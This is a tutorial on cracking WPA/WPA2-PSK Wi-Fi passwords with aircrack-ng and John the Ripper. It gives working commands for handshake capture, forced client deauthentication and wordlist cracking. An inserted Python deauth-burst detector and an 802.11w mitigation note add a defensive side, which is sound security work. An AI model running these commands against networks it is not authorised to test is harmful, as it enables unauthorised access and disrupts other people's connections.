This article demonstrates how to crack a wireless network using the AirCrack-NG suite. Note that this only works against WPA/WPA2 PSK (pre-shared key) wireless networks; that is the limit of the current generation of the AirCrack-NG suite. Only do this on a network that you own or are responsible for and have permission to test in this way.
This article is based on Fedora 32 64bit running on a Lenovo Thinkpad T490s.
Install the software:
yum install aircrack-ng
Take down your wireless device. In my case, the Wi-Fi device is “wlp0s20f3”:
ifconfig wlp0s20f3 down
Do a site survey:
The survey output gives you enough insight into the wireless networks around you to identify the one you want to target. For this example, we’ll be using the wireless network with ESSID “MYWIFI”. Monitor that network for authenticating devices; the authentication handshake is the weak point. The survey shows that the access point is using channel 11 (amongst others), so the command below uses “-c 11”.
airodump-ng wlp0s20f3 -c 11 --essid MYWIFI -w psk
From the above command output, the top-left column lists the BSSID. Pick one; that will be our target.
While the above is still running, trigger a device that’s already on that wireless network to de-authenticate, which forces it to re-authenticate.
In another window (while the above command is still running), run the following command. Note the BSSID (MAC address) in it: this BSSID was taken from the step above. For me, it’s “E0:32:FA:0A:F6:06”.
aireplay-ng -0 1 -b E0:32:FA:0A:F6:06 -e MYWIFI wlp0s20f3
The “airodump” command above should now show a “WPA handshake: E0:32:FA:0A:F6:06” message at the top of the window. A device has re-authenticated which is exactly what we wanted.
Now you can cancel the “airodump” command. There will be a “.cap” file in the current directory. That’s the file of interest to us. If you’ve done this several times, get the name of the most recent “.cap” file.
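The de-authentication step above works because, without 802.11w (Protected Management Frames), deauthentication and disassociation frames carry no integrity protection, so any station can forge them with the access point’s address as source. The following added example (not part of the original article; plain Python with no scapy dependency) shows the detection side of that step: it parses the fixed 802.11 MAC header, decodes the reason code of deauth/disassoc frames, and flags a burst of such frames for one BSSID, which is the signature a wireless IDS alerts on. The MAC addresses, timestamps and frames in SAMPLE_CAPTURE are constructed for the example, and the helper names (parse_frame, build_mgmt_frame, detect_deauth_bursts) are my own.

```python
"""Deauthentication-burst detector over raw 802.11 management frames.

Added example, not from the original article. Frame layout follows IEEE
802.11: a 24-byte MAC header (frame control, duration, addr1, addr2,
addr3, sequence control); deauthentication and disassociation frames then
carry a 2-byte little-endian reason code. Radiotap headers are assumed
to have been stripped already.
"""
import struct

MGMT = 0          # frame-control type 0 = management
DISASSOC = 10     # management subtype 10 = disassociation
DEAUTH = 12       # management subtype 12 = deauthentication
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def parse_frame(raw):
    """Decode the fixed MAC header of one 802.11 frame.

    Returns None for truncated frames, otherwise a dict with type, subtype,
    the three addresses and (for deauth/disassoc frames) the reason code.
    """
    if len(raw) < 24:
        return None
    fc0 = raw[0]
    frame = {
        "type": (fc0 >> 2) & 0x3,
        "subtype": (fc0 >> 4) & 0xF,
        "addr1": mac_str(raw[4:10]),    # receiver
        "addr2": mac_str(raw[10:16]),   # transmitter
        "addr3": mac_str(raw[16:22]),   # BSSID for management frames
        "reason": None,
    }
    if frame["type"] == MGMT and frame["subtype"] in (DEAUTH, DISASSOC) and len(raw) >= 26:
        frame["reason"] = struct.unpack_from("<H", raw, 24)[0]
    return frame


def build_mgmt_frame(subtype, dst, src, bssid, reason):
    """Construct a management frame (used only to build the sample capture)."""
    fc = bytes([(subtype << 4) | (MGMT << 2), 0x00])
    header = fc + b"\x00\x00" + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid) + b"\x00\x00"
    return header + struct.pack("<H", reason)


def detect_deauth_bursts(timed_frames, gap=2.0, threshold=3):
    """Group deauth/disassoc frames per BSSID into bursts and report big ones.

    timed_frames: iterable of (timestamp_seconds, raw_frame_bytes).
    Frames for the same BSSID less than `gap` seconds apart form one burst;
    a burst with at least `threshold` frames is reported as
    (bssid, burst_start_ts, frame_count, broadcast_seen).
    """
    bursts = {}   # bssid -> list of burst records, in time order
    for ts, raw in sorted(timed_frames, key=lambda t: t[0]):
        f = parse_frame(raw)
        if f is None or f["type"] != MGMT or f["subtype"] not in (DEAUTH, DISASSOC):
            continue
        is_bcast = f["addr1"] == BROADCAST
        cur = bursts.setdefault(f["addr3"], [])
        if cur and ts - cur[-1]["last"] <= gap:
            b = cur[-1]
            b["last"], b["count"] = ts, b["count"] + 1
            b["broadcast"] = b["broadcast"] or is_bcast
        else:
            cur.append({"start": ts, "last": ts, "count": 1, "broadcast": is_bcast})
    return [(bssid, b["start"], b["count"], b["broadcast"])
            for bssid, lst in bursts.items() for b in lst if b["count"] >= threshold]


# Constructed sample capture (locally administered MAC addresses, not real devices).
AP = "02:00:00:00:aa:01"
CLIENT = "02:00:00:00:bb:02"
SAMPLE_CAPTURE = [
    # t=0.0: one client leaving normally (reason 3 = sending STA is leaving the ESS)
    (0.0, build_mgmt_frame(DEAUTH, AP, CLIENT, AP, 3)),
    # t=5.0: an ordinary data frame (type 2), which the detector must ignore
    (5.0, bytes([0x08, 0x02]) + b"\x00\x00" + mac_bytes(CLIENT) + mac_bytes(AP)
          + mac_bytes(AP) + b"\x00\x00" + b"payload"),
    # t=60.0-60.7: eight broadcast deauths carrying the AP's address as source,
    # 100 ms apart: the on-air signature of a forged deauth burst
    *[(60.0 + i * 0.1, build_mgmt_frame(DEAUTH, BROADCAST, AP, AP, 7)) for i in range(8)],
]

if __name__ == "__main__":
    for bssid, start, count, bcast in detect_deauth_bursts(SAMPLE_CAPTURE):
        print(f"ALERT bssid={bssid} start={start:.1f}s frames={count} broadcast={bcast}")
```

The single deauth at t=0 is below the threshold and stays quiet; the burst at t=60 produces one alert. The mitigation on the access-point side is to require Protected Management Frames (802.11w), which hostapd enables with ieee80211w=2, so forged deauth frames are discarded by the clients.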
Crack the passphrase using the following command. The “password.lst” file may be in a different location than in this example. You can also download other password lists from:
aircrack-ng psk-01.cap -w /usr/share/doc/aircrack-ng-doc/password.lst
Optionally, you can use John The Ripper to help crack the passphrase.
Install the software:
yum install john
Crack the passphrase:
john --wordlist=passwords.list --rules --stdout | aircrack-ng -e MYWIFI -w - psk-01.cap
If you need to cancel (pressing Control+C, for example) and continue later, the following command (run from the same directory) will continue from where John The Ripper reached previously:
john --restore | aircrack-ng -e MYWIFI -w - psk-01.cap